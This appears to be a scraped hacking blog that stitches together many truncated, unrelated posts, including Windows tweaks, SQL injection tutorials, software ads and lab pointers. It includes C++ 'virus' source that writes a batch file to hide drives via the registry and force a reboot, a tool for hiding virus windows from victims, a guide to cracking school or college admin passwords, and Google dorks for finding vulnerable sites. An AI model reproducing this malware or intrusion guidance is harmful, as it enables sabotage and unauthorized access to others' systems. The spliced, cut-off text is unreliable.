How to disable writing to USB?

Posted by ADMIN On 12:51 AM 0 comments
If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system.  You can disable writing to USB.  This will prevent from file stealing.  You have to login to administrator so that you can access regedit.

Go to start .  Select run.

Type as regedit and hit enter
Now navigate to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies
 In right panel you can find writeprotect and
Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :


#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
This day will be great day!  Because The Brain Hackers get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.

About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.
It may big issue to open the Microsoft 2007 files in microsoft 2003. But it is easy to open the file in Ms 2003. You have to download the MS2007 compatibility pack for Ms2003.

Download it from here:

http://www.microsoft.com/downloads/details.aspx?FamilyId=941b3470-3ae9-4aee-8f43-c6bb74cd1466&displaylang=en

Enjoy...!!!
This post is not about hacking. It just windows tweak or trick.
Just change your localhost name and enjoy it.

You have to well know about this:
How to use wamp/xamp server.
What is localhost.



It is very simple to follow. This is for windows users only.

Steps to follow:
1.Go to C:\WINDOWS\system32\drivers\etc
2. Find the file named


When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:
Brain Hackers

Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Autorun functionality:
To disable the Autorun functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.



Simple way to disable autorun.inf :
Follow this link and download the msi file:
http://go.microsoft.com/?linkid=9741395

Fix it yourself-Manually disabling the autorun feature:
To disable Autorun yourself on operating systems that do not include Gpedit.msc, follow these steps:
Click Start, click Run, type regedit in the Open box, and then click OK.




Are you getting often error report in windows xp? this trick will disable the error report creation.


  • Right-click My Computer and choose Properties.
  • Click the Advanced tab on your System Properties dialog box.
  • Click the Error Reporting button on the Advanced tab.
  • Place a checkmark next to "Disable error reporting."
  • Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."
  • Click OK.
that's all you finished.  From now
What is Thumb.db?
when you view a image contained folder in thumbnail view,thumb.db file will be created.  It is is a cache of the current picture in that directory.to remove it go for following
 open "WINDOWS EXPLORER".
go to "TOOLS".
open "FOLDER OPTIONS".
go to "VIEW".
see 1st section "FILES & FOLDERS".
click on the "DO NOT CACHE THUMBNAILS".
Using some softwares you can change your web camera as spy or Surveillance camera.  here i give you some  softwares links.



Rise Sun(Complete  Free Software)
  • Adjustable Motion Detection Sensitivity
  • Adjustable Webcam Performance
  • Automatically takes a snapshot when movement is detected
  • Automatically logs a record when movement is detected
  • Automatically sounds an audible alarm when movement is detected
  • Automatically displays a silent message when movement is detected
Here i give you list of shortucut commands to open the windows program faster.  If you practice the shortcut ,then you will access the windows default programs much better than any others.  you can impress your friends/lover or any others.  No need to try all shortcuts commands, just try for frequently accessed programs.


Just press CTRL+ R and type the command and press enter.
or
Just go to Run and type "cmd" and then write the Shortcut commands to open windows Programs faster.

Here is the Shortcut commands for you:

appwiz.cpl  ----> Add/Remove Programs
access.cpl  ----> Accessibility Controls

The Fastest Way of searching the directory in windows

This computer trick will save the all sub directory and file names in text file.  This may helpful to analyse the direcotry(you can know what are the contents inside the window without browsing by simple commands).


Step 1:
First of all open command Prompt.
Step 2:
Browse to folder which you want to analyze the sub directories and files by using cd commands. For Example if you want to visit d:/interview folder then
try this command.
Type "d:"
then "cd interview".
we all know that can't create con folder in windows

Here is simple trick to create con folder in windows using Command Prompt.

Step 1:
Open Command Prompt(Start->run->cmd)
Step 2:
Type this command:
md \\.\d:\con
This will create con folder in D Drive.
Step 3:
To Remove the folder type this command
rd \\.\d:\con
This will remove con folder from D Drive

A Reason Behind the Con Folder Creation in Windows

We all know that we can't create Con, Folder in windows. not only con but also " PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more".

Here i am going to explain why you can not create the con folder in windows.

Reason:

We can not create folder with con,aux, nul because these are reserved keywords used by DOS. so if u r allowed to create such folders, there will be an ambiguity in where to write data when
Hi Brain Hackers Friends,
"How to Hack windows admin?" This will teach you how to hack the windows password. You can use the above tutorial for hacking any type of windows Operating system. For Example: you can hack the latest Windows 7 also.

There is only one change is required to do. i.e., You have to choose the correct Rainbow table corresponding to the Operating system that you are going to hack.

You can get all type of rainbow table from here:

http://ophcrack.sourceforge.net/tables.php

If you are School/College/University students, you may curious to hack the admin password in your college or school system. This post is going to help you to crack the any type of windows accounts passwords. Learn how to hack the windows admin password like a geek.


Requirements:
  • BackTrack Linux 4 or 5. Download it from http://backtrack-linux.org
  • Two Pen drives [if you are going to test in your own system, one pen drive is enough]
  • Xp Free Fast RainBow table [tables_xp_free_fast.zip]. Download it from here:http://ophcrack.sourceforge.net/tables.php

If a website newly registered in internet world, it may not be loaded in your computer.  For example, you register for example.com yesterday, still you may not see your web page. This is problem of DNS cache.  Your local DNS cache is old one so it won't know the newely available domain names.  Sometime you may update the NS records of your domain to point to new hosting service.

In these case you have to clear or flush cache in your computer.



How to Flush cache in Windows?

  1. Open Command Prompt(Start->Run , type cmd and hit enter).
  2. In command promt type
Hi friends, today i faced a problem.  A virus attacked my XP. I was unable to use Task Manager, System Restore,cmd,run,Registry.


This malware disabled important windows features(task manager, system restore,.......)


Whenever i try to open the Task Manager, it pop this error message as " Task Manager is Disabled by Administrator. Contact admin" .

When i try to use System restore "it said restore is turn off. it is disabled by administrator".

So i started search in Internet , finally i found the solution.  If you have this problem,
Don't get panic.  I will help you to fix this problem because i faced this problem.(Experience man..!!!)

Realplayer Gold plus 11

Real Player Gold Plus 11: The best media player for watching, downloading, converting & organising your videos.
Real Player Gold Plus 11 Gives You the Ability to download videos from Thousands of Web sites with just one click, and even now You Can Burn Them to CD. Watch Them Whenever and wherever you want. Download Internet videos with one click, build your own video library and playlists, or burn your favorite videos to CD or DVD with RealPlayer. RealPlayer plays all major audio and video formats.

SPAMfighter 7.5.149

SPAMfighter works with Microsoft Outlook and Outlook Express. Spam is identified with a list from other users. Every time you mark a message as spam everybody else with SPAMfighter has it automatically marked and deleted.

You can create a whitelist with SPAMfighter so that emails from people in your address book will always get through.

CuteFTP 8 Professional for Free Download

Cute FTP 8 Professional-Cute FTP Professional is a powerful FTP client for Windows. It enables you to connect and transfer files securely using SFTP (Secure Shell/SSH), FTPS (Secure Socket Layer (SSL) over FTP) and one-time passwords. You can transfer files quickly using CuteFTP Professional's multipart transfer and simultaneous connections. Easily manage and maintain your Web site with the built-in HTML editor, as well as the Folder Synchronization, Folder Monitor, Site Backup, and Compression tools.

Registry Booster 2012 for Free Download

Registry Booster 2012 is the easy answer to all your Windows registry problems. This award winning software starts by conducting a deep scan of your registry, checking for file extension errors and other registry conflicts. Registry Booster 2012 will then repair or remove unused, corrupted and harmful files so optimizing your PC̢۪s performance. You can then use regular scans to keep you registry structured and your PC speeding along at peak efficiency.

MProjector 3.1.1k for Free Download

MProjector enables you to build rich-internet applications for the desktop using Adobe Flash. If you know Flash and a little ActionScript, then creating Mac and Windows desktop toys, widgets, and applications is just a few clicks away.

FolderIco for Free Download


FolderIco: allows to customize the icon of every Windows folder in one click!

Organise your folders more easily
Don't you know how to change standard yellow folder to a colourful and bright one? With FolderIco, give some color to Windows folders. With just a one click, colorize your folders, and discover a new intuitive way to classify your files. A quick look is now enough to identify the folder you are looking for!

Talk It!, also called TalkAny, was a popular text-to-speech (TTS) software by SoftVoice, Inc. and was originally included in the Windows 95 version of Microsoft Plus! under the name of "Microsoft Plus! for Kids". It was used to teach children pronunciation of words and for simple text-to-speech uses, including narration and accessibility.


Developer is the one and only reason for the SQL Injection Vulnerability. While developing the Web Application, he fails to handle some vulnerability(because he doesn't know about it. Don't be one of them. If you are Web Application developer, then you must read these security techniquest in order to overcome the SQL Injection Vulnerability.


Reason 1:Incorrectly filtered escape characters
In this case, the developer fails to filter the input for escape characters and He directly pass the input to SQL statement. This results in vulnerability.

Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"

This code will check the username in datbase. An attacker can use malicious codes to inject his own query.

UPDATE: Safe3 Sql Injector v8.6

Posted by ADMIN On 12:03 AM 0 comments
Safe3 developers have brought us the updated Safe3 Sql Injector version 8.3.


“Safe3 is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.”

This update fixes a lot of bugs.

Download Safe3 Sql Injector v8.6 (Safe3SI v8.6) here.
So far i have written what is sql Injection, How to prevent SQL Injection? .  In this post, i am going to introduce a new SQLi tool for Pen Testers and Webmasters.
The tool name is SQL Inject Me.
   
What is SQL Inject Me?
    SQL Inject Me is Mozilla addon that is used to test the SQL Injection Vulnerability of Web Application.  It reduces the workload of Manual SQL Injection Test.  This is especially designed for Pen Testers and Web Masters not for hackers.



Download it From here:

    https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/

How it works?
The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.


Hi webmasters and budding Pen Testers, I hope you read my article about SQL Injection. Our Aim is to provide Security, right? So here is the prevention techniques.



 

Use Prepared Statements:

Use prepared statements, parameterized queries, or stored procedures. Don't use Dynamic SQL.

  • In Java you can use PreparedStatement() with bind variables 
  • In .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables
  • In PHP you can use PDO with strongly typed parameterized queries (using bindParam()).

You can use Stored Procedures also.  Unlike prepared statements, stored procedures are kept in the database. Both require first to define the SQL code, and then to pass parameters.
WebApplication(Website) stores the information in database such as user info, admin info, and passwords. When the developer fails to handle escape characters and type, it results in vulnerable database. Hacking or accessing the database using this vulnerability is known as SQL injection.

 
 
What an attacker can do?
  • Bypassing Logins
  • Accessing secret data
  • Modifying contents of website
  • Shutting down the database server
When Database is vulnerable?
When the developer fails to validate the Inputs, this vulnerability occurs. So the application runs the query without validating client’s input.
Recently 90000 webpages infected by Iframe Injection attack.  Here i am going to explain what  IFrame Injection is.

What is an IFrame Injection?
Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites.  So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website.  Malware  will be loaded to your computer, now you are infected


What is IFrame Tag?
<Iframe> tag stands for Inline Frame.  It is used to insert contents from another website or server.  That can be useful for building online applications.
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



 
 
Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

How to Find a vulnerable website?

Posted by ADMIN On 7:19 AM 2 comments
 Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.

Small List of Google Dork:
inurl:index.php?id=

inurl:gallery.php?id=

inurl:post.php?id=

inurl:article?id=


1)    Remote File Inclusion or RFI
2)    SQL injection
3)    Cross site scripting or XXS
4)    Local file inclusion or LFI
5)    Directory Traversal attack





  RFI:
  RFI stands for Remote File Inclusion and it allows the attacker to upload a custom coded/malicious file on a website or server using a script.  The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

   1.  Code execution on the web server
   2.  Code execution on the client-side such as Javascript which can lead to other attacks such as cross site  scripting (XSS).
    3. Denial of Service (DoS)
    4. Data Theft/Manipulation
 In this tutorial i am going to guide how to hack the website database using SQL injection.  First of all you need to understand what is sql injection.

How to Break the Database:

Step 1 :
First we need to check whether website is vulnerable or not( i meant hackable or not) . In order to that, you need to find a page that looks like this:


www.site.com/page=1
or
www.site.com/id=5 
 
Enter this url into google search or address bar.  Basically the site needs to have an = then a number or a string, but most commonly a number.
You may heard about Sql Injection or this is new word for you now.  In this post i am going to guide to Hack the website using the SQL Injection.

What is SQL?
  SQL is acronym of Structured Query Language.  SQL is common language for communicating with the Database.

What is SQL Injection?
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL
The main source-code repository for the Free Software Foundation has been taken down following an attack that compromised some of the website's account passwords and may have gained unfettered administrative access.

The SQL-injection attacks on GNU Savannah exploited holes in Savane, the open-source software hosting application that was spun off from SourceForge, Matt Lee, a campaigns manager for the Free Software Foundation, told The Register. The attackers were then able to obtain the entire database of usernames and hashed passwords, some of which were decrypted using brute-force techniques.

Project managers took GNU Savannah offline on Saturday, more than 48 hours after the attack occurred. They expect to bring the site back online on Wednesday, although they're not guaranteeing it will be fully functional. Out of an abundance of caution, restored data will come from a backup made on November 24, prior to the compromise. Lee said there's no reason to believe any of the source code hosted on the site was affected by the breach.

What is Database and MY SQL Injections

Posted by ADMIN On 3:32 AM 0 comments
In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.

  What is the Database?
  Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.


Database is a place that stores username,passwords and more details.  Database should be secured.  But providing high level security is not possible for all sites(much costlier or poor programming ). So Database of many websites is insecure or vulnerable(easily hackable).
Hi Brain Hackers readers, so far i have gave the Web Application Pen Testing tutorials .  Now it is time to for practicing your skills in legal way. Last time , i explained about the Damn Vulnerable  Web Application(DVWA).  This time i came with different web application  that will develop your knowledge in Web App PenTesting.


The BodgeIt Store
Like DVWA, This is also a Vulnerable web Application that will help you to develop your skills in Pen testing.

With this Vulnerable Application , you can practice the Following attacks:
  • Cross Site Scripting (XSS)
  • SQL injection (SQLi)
  • Hidden (but unprotected) content
  • Cross Site Request Forgery
  • Debug code
  • Insecure Object References
  • Application logic vulnerabilities
There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not.

I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal way.
Blind SQL injection technique is used when the web application is vulnerable but the output doesn’t display to the attacker. When hacker tries SQL injection, they will redirect to some other pages instead of error message. Blind SQL Injection is harder to implement when compared with the above Traditional SQL Injection Technique, it will take more time . There are some tools for Blind SQL Injection.

Blind SQL injection can be done by querying the database with sequence of true/false questions.




How to detect the Blind SQL Injection Vulnerability?
Web application gets the clients input and supplied in where clause to retrieve data from Database. For instance, let us say the web application gets id and supplied to the sql query as follows
What is Blind SQL Injection:
Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker.  In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.
There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).

This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections
1) http://www.be007.gigfa.com/scanner/scanner.php
2) http://www.sunmagazin.com/tools/hack/SQLI-Scan
3) http://scanner.drie88.tk
4) http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan
5) http://wolfscps.com/gscanner.php


Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
1.originally, someone who makes furniture with an axe1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.

2. One whoprograms enthusiastically (even obsessively) or who enjoys programming
rather than just theorizing about programming.

3. Aperson capable of appreciating hack value.

4. A person who is good at programming quickly.

5. An expert at a particular program,
or one who frequently does work using it or on it; as in ‘a
Unix hacker.’ (Definitions 1 through 5 are correlated, and people

Step1: Create Bootable USB Drive:

   1.Start PowerISO (v4.8 or newer version, download here).
   2.Insert the USB drive you intend to boot from.
   3.Choose the menu "Tools > Create Bootable USB Drive". The    "Create Bootable USB Drive" dialog will popup. If you are using Windows Vista or Windows 7 operating system, you need confirm the UAC dialog to continue.
   4. In "Create Bootable USB Drive" dialog, click "..." button to open the iso file of Windows 7.
   5.Select the correct USB drive from the "Destination USB Drive" list if multiple USB drives are connected to the computer.

Avira Premium Security Suite 10.2 


Avira Premium Security Suite:
All round protection for you and your family Premium Security Suite is essential if you:Rely on the internet for everything

                     Live TV Software 2011

Google Translator

Search Box

Blog Archive

User Status

Free counters!

About Me

ADMIN
Pakistan
View my complete profile

Recent Posts

Recent Comments